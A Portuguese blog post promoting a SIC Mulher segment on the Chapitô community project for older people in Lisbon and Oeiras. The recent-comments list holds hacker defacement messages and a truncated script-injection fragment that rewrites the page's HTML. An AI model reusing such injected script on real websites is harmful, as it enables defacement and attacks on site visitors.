O Projeto Comunidades, dinamizado pelo Chapitô em parceria com a SIC Esperança insere a sua tónica na participação e no envelhecimento ativo, visando a exploração de competências de cerca de 300 utentes divididos por 10 instituições de solidariedade social nos concelhos de Lisboa e Oeiras, através de um conjunto de dinâmicas pensadas, relativamente, à adequabilidade das faixas etárias.

O Projeto divide-se em três eixos de intervenção: o envelhecimento ativo, a participação e a integração e em três etapas: a primeira centra-se no reconhecimento territorial institucional, na descoberta dos universos e gostos individuais de cada utente inserido num coletivo, assim como, na construção de relações de empatia, comunicação e confiança.

A segunda etapa, onde atualmente a equipa de intervenção se encontra, articula-se com o desenvolvimento e aprendizagem de dinâmicas relacionadas com a temática do teatro, canto e vivências experienciadas outrora. Nesta etapa, além da componente formativa da ação, a equipa visa a preparação e construção de uma estrutura final a ser apresentada, pelos utentes, à instituição, famílias e possíveis instituições parceiras, envolvendo o todo na criação de um laço em comunidade.

A terceira etapa articula-se com a fase de implementação de projeto, em que, os utentes constroem uma intervenção final (espetáculo), que tem como propósito colocar as competências e saberes em prol do princípio da efetivação da participação e cidadania ativas.

Em todas as instituições em que a equipa Chapitô intervém nota-se um profundo crescimento dos utentes ao nível das dinâmicas realizadas, tais como, esculturas de balões (sendo uma experiência nova, a adesão foi completa, tornando-se num instrumento ótimo de trabalho), magia e dinâmicas vocais, musicais e teatrais. Além de obter uma adesão total por parte dos utentes, as reações das responsáveis institucionais são sempre construtivas e de confiança total.

Do ponto de vista metodológico, o projeto visa também promover a autonomia quer dos utentes na sua representação institucional, quer das próprias instituições, inovando socialmente no tipo de respostas, mais adequadas que promovam os princípios gerais, neste caso do projeto: - envelhecimento ativo, participação e integração.

 

Não perca este projeto tão especial que visa pelo desenvolvimento de toda a sociedade!

No Mais Mulher desta segunda-feira às 17:330 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO